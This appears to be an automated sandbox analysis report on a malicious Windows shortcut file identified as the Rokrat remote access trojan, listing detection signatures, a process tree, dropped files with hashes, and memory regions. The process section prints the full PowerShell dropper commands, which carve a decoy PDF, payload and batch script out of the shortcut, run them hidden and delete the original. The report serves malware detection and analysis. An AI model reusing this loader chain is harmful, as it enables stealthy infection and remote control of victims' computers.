Resubmissions

29-05-2024 10:21

240529-mdm2rsbc9s 10

08-04-2024 07:38

240408-jge9jsca66 10

Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    29-05-2024 10:21

General

  • Target

    358122718ba11b3e8bb56340dbe94f51.lnk

  • Size

    56.2MB

  • MD5

    358122718ba11b3e8bb56340dbe94f51

  • SHA1

    0c61effe0c06d57835ead4a574dde992515b9382

  • SHA256

    b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56

  • SHA512

    7c4beb041fde779e21b01f26c571026b1ba38a24002b89bc57ca6cf2bc0e6e0ff38f6a100a30e3622eff403ba7ebb572839b033f81b0663939666a443184eb01

  • SSDEEP

    98304:xe9nAp+et8sMdP7jKFYM0bI1/c/zNYP2wn:xIAp+etaZvdm/wG2wn

Malware Config

Signatures

  • Detect Rokrat payload 2 IoCs
  • Rokrat

    Rokrat is a remote access trojan written in c++.

  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2656
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:2632
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        3⤵
          PID:2800
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Deletes itself
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
            "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.pdf"
            4⤵
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            PID:2592
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2840
            • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Checks BIOS information in registry
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2816
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bmp7xbvb.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2204
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4606.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4605.tmp"
                  7⤵
                    PID:1368
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1bf0ahz0.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1256
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4664.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4663.tmp"
                    7⤵
                      PID:1320
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yxgbb9bj.cmdline"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1964
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES46F0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC46EF.tmp"
                      7⤵
                        PID:2248
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wqwixadp.cmdline"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2216
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES475D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC475C.tmp"
                        7⤵
                          PID:2932

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\1bf0ahz0.dll

              Filesize

              3KB

              MD5

              0db1ab0c9a56b150be8644bd41fedb81

              SHA1

              537cd18fcda6e42d035acaa3d61c2f124dc0293b

              SHA256

              b193c712f75697bbe4b3998519f7d2f4ec5ee54d8a5a51101b4ae130094e0f15

              SHA512

              8a99b09c6993dfe64f14540cb6b0cb02f14d1e48f03532e067e51f7d7c7ee648703309fc323c223bc0c7ddf3e5d7521bdd24f86c815dbed67fe83501c750a893

            • C:\Users\Admin\AppData\Local\Temp\1bf0ahz0.pdb

              Filesize

              7KB

              MD5

              62d6bbe8eff0ce217ccb1202f56e1072

              SHA1

              0bef035d188dba6cbfc6aee40139e870aadeff97

              SHA256

              f812804c2a0cf570bfe61727a42e0f2e99b1777b61d946c0c0c01e2bd30dd76a

              SHA512

              4fb171d8df26bde916903013a035162b7d55458cb627b48931292f5dabdb02a38ed1f23101077af5b0108aa2513f19b14d633a33e219fec1fcd424fafebc492a

            • C:\Users\Admin\AppData\Local\Temp\2C3744F3.tmp

              Filesize

              46KB

              MD5

              4bf350436194d338bf61049f0f895edc

              SHA1

              e71b18c77d09742267cabe576cbd9cf1eb668f28

              SHA256

              d03c35cba60abf93ccef3aaa2375329f2b2edba0ff7a851075cc090939d31f0b

              SHA512

              a62d0014f25bf86d3b1323643f7df241f81a05cce4246e2fef2a21728d0e0341fb276d09b803750bfbf38b729a8c52e51c741c6756cae7fc88db49d3b7658d9e

            • C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.pdf

              Filesize

              4.7MB

              MD5

              29ec187f2ed2eca0953dca0a68ac3722

              SHA1

              a20557b2e4a8b2c5e8a735c5d2f30aeaad01726e

              SHA256

              81269c3c41d957765314a1704e0ea6cdf9666eab729597207fd1cc844c749beb

              SHA512

              890a37f5e8fbe4d1cef6d52ec0c7b6dbf378f3545a59cdef1d796fee0aec8662564cdfd86f019f8e6bd60d8c678b72746200a1ce917a867bd21546ed06ac2bc8

            • C:\Users\Admin\AppData\Local\Temp\RES4606.tmp

              Filesize

              1KB

              MD5

              8fa5725bf930dfaee9e694acdac5bd6a

              SHA1

              bb8a8a5a3f7e4f68828b624e34b29bca17ccf61a

              SHA256

              b1b2eb9d45560fd29212978a748a70eca5b7d905009ddc0822d8679e87afdb8f

              SHA512

              28f3b1714abca87cadda85c08521c6fc6cbfd8574d4824c522b9ec8089ee27a2fc119b1705a73771c8209a5285b36b1beb32182222bafcf8a75b4bfad84b4ba5

            • C:\Users\Admin\AppData\Local\Temp\RES4664.tmp

              Filesize

              1KB

              MD5

              8aa8f8900e67923ac73b3c6a68e86b77

              SHA1

              0a21ee5339e964381cf512dede03b372c279d7d0

              SHA256

              10a19c71f9a94339881a8cd9d0ce936fcb20976ba2aa084907e9d7ab4732a5c2

              SHA512

              c84626e45ee49c4861d6cca42bf64f3530f5d450c421c5b8f059d91b8de06217bd99367b1b0246376c76bc95d223da13a0f025f7348ba209bf17a4ca7deb5de4

            • C:\Users\Admin\AppData\Local\Temp\RES46F0.tmp

              Filesize

              1KB

              MD5

              460bab97fb39502fe93cd5bc843981b0

              SHA1

              d8adbc3c53683d83bc60efd19497415a0bcb2614

              SHA256

              303a614769986c9ead04196b548d4cc6b71eaf3dd6798185a323a7c607311e20

              SHA512

              f36d6c78792f431cf23c2656e8a062df7c6febc20958cf65dc18f3db397f75b53f4980292656a0fe28e2745dd8dccb8acbbb47bfd169c863172955294b86fecf

            • C:\Users\Admin\AppData\Local\Temp\RES475D.tmp

              Filesize

              1KB

              MD5

              1a431e966a4c440d80395539857400c5

              SHA1

              88fa8a6e02d9072a616c61cfcc90412cfc2db10d

              SHA256

              6d9d5d768f17a099961f7eddb8bfe5ea7082efa1b935564c68e1c950c2abd070

              SHA512

              21dcb2d2f79c5096fb2655aed087180ed68bb4b852cea4c7f6eb7292580a0bf73f624d66c04c73e5c939f2c53c518f0164cfef8e3fc61f29c88202ea9264377d

            • C:\Users\Admin\AppData\Local\Temp\bmp7xbvb.dll

              Filesize

              3KB

              MD5

              08990b0c537c66a95b0140eace11315a

              SHA1

              fca6682a52fe70eb9988bc08b2b27b556ad69778

              SHA256

              726b8168cd6aad3536efe45e83d1cf3e5fdfc4ffeb47327c409e92c08e846ca9

              SHA512

              736b3c76333d4d58c8a75c28c6d0c8a4bce2aca26d78214dd1c67581735f92bc832821ea52ead5b1dd776cbb866a3923ae6a02dba8b4880225bfd6832ae17905

            • C:\Users\Admin\AppData\Local\Temp\bmp7xbvb.pdb

              Filesize

              7KB

              MD5

              8eb58e59294e68abd113ca64f2080c43

              SHA1

              23fd298f7e7d7a7d33ff559661aa4f9de9a61d55

              SHA256

              390f6cb31b8faa9f3defabcaf4c8f7615fa7166b699bd57842284d62e5065af3

              SHA512

              ada744967f7005bdf6d75ca2708ca4c2f99e4a9d00985399084cee31d472798b943dd47cec63f9f407f68cb8bacd70aa56b2a6ffac6a2b6ed9c765f01778eab8

            • C:\Users\Admin\AppData\Local\Temp\para.dat

              Filesize

              1KB

              MD5

              655f58dcd7cd8bd996076ad4b492ae00

              SHA1

              7d69d7926de1ad560f0d002bd768eb182177cca4

              SHA256

              4e9d83e270910fa2610a2bdb0fef2bc2f5a2c257ce8c9eb5ba3f73eb051f5cf7

              SHA512

              87575186d8674c4be4f736db9b008b5ef975a21b60d38a635ad874dd399b5263fc6cba94e6010681c6262241df3b1f3074411c815121141414727c326d70e204

            • C:\Users\Admin\AppData\Local\Temp\price.bat

              Filesize

              311B

              MD5

              f5787b3e60fad2b255ebc54d0ce747dc

              SHA1

              830705c5417f11c730cd8bbde4a2a709671cc11d

              SHA256

              a43f7b080c30816997fc15589f904365917f30ae15441b22fbda11aec2ddf1c0

              SHA512

              1e702414e37c90da42457295653e4df5a64208476206e001d8c23edfe5b8e7e5145672b5e0abf5bc4667e4e059735066db4c0a6a04cca259eb96e7755ce6cd8f

            • C:\Users\Admin\AppData\Local\Temp\wqwixadp.dll

              Filesize

              3KB

              MD5

              a152ac8076837b9ecb694d460cb14789

              SHA1

              a1e43e620b1cfa50d15e318104f2b4c0b88f84b0

              SHA256

              96758b042c934985d033c57ea0ae1b472ef7d87eb336ddc80a2f57861ac6b29f

              SHA512

              200061adcd108dd09cecb74f9fb94907575f8e8c2744312bf79871d11c16e0ebef4bdd8085dcd8f4e7c62e751997fd861fc213fb96b9f0dc2dd1f01dacf37ce6

            • C:\Users\Admin\AppData\Local\Temp\wqwixadp.pdb

              Filesize

              7KB

              MD5

              95014d3a2472a0e9eb03a8d9efdfa9aa

              SHA1

              d4a038298199d0a0dd3525cf8523891330ef9fce

              SHA256

              65d864a69e9768a427c17820002aa482d34cfa9df8f8cad52360549fe5d8147f

              SHA512

              5d83ae943c83302a8489b2e0fc59f61d7b70c0b5ebfaca99564d55e901399fd8377bd575cf6599ca0370be09102a78665907e2536daccf4e6f58c3d861fb5ab7

            • C:\Users\Admin\AppData\Local\Temp\yxgbb9bj.dll

              Filesize

              3KB

              MD5

              61cc48be8b62f929f81917687e86b3b2

              SHA1

              7df6e69ad4ae946c0781a2929a50677fd25e1f2e

              SHA256

              3c4d1b9a5f8f3795a92a553de45f3a79c80276f0eae62253d6ebafc12b84062f

              SHA512

              8d49d29f83c3afe51e3e94cfb587baccd8c983cb12a90eb81a473f915b6d40b15da3ce60c8f3cd8b591ab4e5379bd1cc7b02a770b54b7a431bfe7e8605c41381

            • C:\Users\Admin\AppData\Local\Temp\yxgbb9bj.pdb

              Filesize

              7KB

              MD5

              7fe7f20c1c53b899d907a55980e8a8e8

              SHA1

              1bc4b1b6448bff4d837cb6702dfd06b15421b047

              SHA256

              93f8b2c3cb293a8571ecf001eb7a88a3d6d525e9b66aa5663d6c24680801efa6

              SHA512

              7a7641fa3d9cd6de089bbda9bf97904388df03f49485365f747322f3e51e445dd2be8fce5b168088caea6e948371a805af36d03dbcde5cb4e07213f0d00f8740

            • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

              Filesize

              3KB

              MD5

              c8764e993edc7830653697195085c6cd

              SHA1

              d63ffdea37607e8918d38cb97531e72cd872b7c3

              SHA256

              eb9e5ca5b603e4a1382671dc2082846eda450e12c21cb0b4ebd25fe5578598c9

              SHA512

              b2aa8f5eec0f0d495de9d54b97139bc7459e5f08d26cd819fc29d0427793d8472f3c50326047a87e0831a8fcc9d7e2a8ab1621fdf67a409d6edf5e7dc7010100

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

              Filesize

              7KB

              MD5

              33eba9ee65bbf09c41e5f429e62d6498

              SHA1

              f1f15ac26df4427c32c86973289a85c01280950a

              SHA256

              0066f2d40d96002f1d9355d6da48ee64c366dbf0623ddce8d488361f3ddc26ca

              SHA512

              6052f21a96a29198ba5c1d048d7c2b64a7f50f4fbb0f4076489ef240e7f61de534aaeeda54c7e6a68f4b2b07c8fcd2b6a5e966968c9b2c249fdaaedf4ebda9be

            • C:\Users\Public\panic.dat

              Filesize

              869KB

              MD5

              a043b3a2af9db6173e3a39b5c501a9bd

              SHA1

              4250f3855e53ccf755f8a05b1998f55dfa4b2c0e

              SHA256

              dc6ca2e9ce800245a65715647bb1614c35632f270d1879e796472e786cdfc0fc

              SHA512

              a667c8521589e96ba57b2ae6e429f43a352c36968edb4cadf57500a1a5e39511b3e7109bb2c372b9567c8e50777cfc71f0cb8150f2782a6a8ac9d90222f802f5

            • \??\c:\Users\Admin\AppData\Local\Temp\1bf0ahz0.0.cs

              Filesize

              272B

              MD5

              4de985ae7f625fc7a2ff3ace5a46e3c6

              SHA1

              935986466ba0b620860f36bf08f08721827771cb

              SHA256

              53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

              SHA512

              067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

            • \??\c:\Users\Admin\AppData\Local\Temp\1bf0ahz0.cmdline

              Filesize

              309B

              MD5

              1e5f3023c3e8a67058ea3a7882902844

              SHA1

              4e35188b86a6e60bd11dd33500998de823871b1b

              SHA256

              092c1dfd1b9233ecd5f0f3c4218507364f80c447f58cfea4957c5cf284529897

              SHA512

              b1308d39e1526ac23d6b33142fe2011ee588f155dbfb6a6d26c01889c738bbd0ebbe161c3e4443f4a35a0336032587f02555e87eb23e307696d1fc6165bd294c

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC4605.tmp

              Filesize

              652B

              MD5

              ec730768950b4d8d8e4a3f1302d6e823

              SHA1

              9ab0ef78b598ffc4e1964e307af366357409d8b5

              SHA256

              ff8fd7276edf7b842a2ea0f6a45dc57d793c732c0ee214936c7663e3fe3728d0

              SHA512

              85e9ad46589fa7853135c28a1a83c1133a87382002b4d4e6af58023a7f2b24abec267530ecaf0ff41fa728f6115a41db79d0c819f358bcc0a2f30cbf9489b8cc

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC4663.tmp

              Filesize

              652B

              MD5

              f850343519aed0a1c0e8ad14348fff7e

              SHA1

              de5f1c1991198655a079ccdc43381b36d918b113

              SHA256

              cf25ebfd67e011dd9fedf992bfdd8518e89b90cfff621fbfa7ec96e8275aac9c

              SHA512

              bd6dd5d6989974af261fe6dc95218021ba0ebb010ee24c0fe3b99de5f0d685b12e4cf13737c1f43cf5cd2f53b05e38c4de222b8b4a0038c5284f060eb12b0b56

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC46EF.tmp

              Filesize

              652B

              MD5

              834ebd0a590977b64cdc6a071e5f46ba

              SHA1

              f30b5ed3499a077044060b2a2c59f2e38427f806

              SHA256

              a4f898ba4be4f4f066697a74cc04a356a0e9c85ac5d78111d5688438d4a6f157

              SHA512

              d2fa3b276751fb239349a89b7b51b87be32acbea0afb6abb7614cdf2232c4b34b17d9c9a1805ff4a457185f6ff84c06ed28dddf315f19ed52d6af5016b67d567

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC475C.tmp

              Filesize

              652B

              MD5

              cea56b78b72ebe5e63740e773fdecc9b

              SHA1

              4a229861ec8edd5a7ee421217abe82a9d06652f7

              SHA256

              965be524f1908a5cf525512ff69066a5b6333bdca20832d8332e81c068b3e30a

              SHA512

              a38361b74e9c95e76f6e55a7855877f78b177c57d4aa7f0d3d7216794a119e625187f88d034424f197762fdc1d6abb01f65fb431aaa342386fdf89e7eee6d33f

            • \??\c:\Users\Admin\AppData\Local\Temp\bmp7xbvb.0.cs

              Filesize

              249B

              MD5

              69ecfeb3e9a8fb7890d114ec056ffd6d

              SHA1

              cba5334d2ffe24c60ef793a3f6a7f08067a913db

              SHA256

              0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

              SHA512

              be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

            • \??\c:\Users\Admin\AppData\Local\Temp\bmp7xbvb.cmdline

              Filesize

              309B

              MD5

              b8de89296c67df790535cbbe85812332

              SHA1

              fbd2c822e416fc2b251089af5c51f0a047a50860

              SHA256

              31dbc6a83c1ef98345c127b9384ff1502a85b650b8b9ad786c4ebb564f6fc25f

              SHA512

              50f9aa26463e1a1cefc031606117554a76812305197cb565667b34ccd91abf85553b57ee150e54e52ee3aab44416dff755a2cd9dc52dd325fe83f8278e036d28

            • \??\c:\Users\Admin\AppData\Local\Temp\wqwixadp.0.cs

              Filesize

              259B

              MD5

              560e1b883a997afcfa3b73d8a5cddbc1

              SHA1

              2905f3f296ac3c7d6a020fb61f0819dbea2f1569

              SHA256

              e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

              SHA512

              041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

            • \??\c:\Users\Admin\AppData\Local\Temp\wqwixadp.cmdline

              Filesize

              309B

              MD5

              e685cc00979541fbf76b528b1ab372ec

              SHA1

              25602362749f416f737939218ddc7c2f860436df

              SHA256

              9c26f283f6a96d0fe7177dcfd76e4a1719b26afd48836194fd015f76527c0c1c

              SHA512

              e1d7376c60cb4606fcbadae7888b5690f1c85e62209ef48dc10c2e089f5bcf18ccec95c4a698450f1a40cd82fbf8823c2fb0e599e689f6814b8902c8bb8ed8b6

            • \??\c:\Users\Admin\AppData\Local\Temp\yxgbb9bj.0.cs

              Filesize

              286B

              MD5

              b23df8158ffd79f95b9bddd18738270b

              SHA1

              79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

              SHA256

              856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

              SHA512

              e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

            • \??\c:\Users\Admin\AppData\Local\Temp\yxgbb9bj.cmdline

              Filesize

              309B

              MD5

              e7cf01021a6059dce5520a1ce6412043

              SHA1

              cb941871a2737bf648ea2745c2256f9ecbad778f

              SHA256

              5a65a4747445742e6c8846cccedead16f2ea8692ecedce6bdb64ac7273ab3231

              SHA512

              318fca28ec80be3c4cfef630f78d9ddcb935a698e58d5da78b1a4fd40e5c76a9e170678b4e65e08cfb483830ea200cab46139befd8d3678e9bccd0f87d745a4c

            • memory/2816-134-0x0000000005590000-0x000000000566A000-memory.dmp

              Filesize

              872KB

            • memory/2816-135-0x0000000005590000-0x000000000566A000-memory.dmp

              Filesize

              872KB

            • memory/2816-136-0x000000000B4C0000-0x000000000B5A3000-memory.dmp

              Filesize

              908KB

            • memory/2816-137-0x000000000B4C0000-0x000000000B5A3000-memory.dmp

              Filesize

              908KB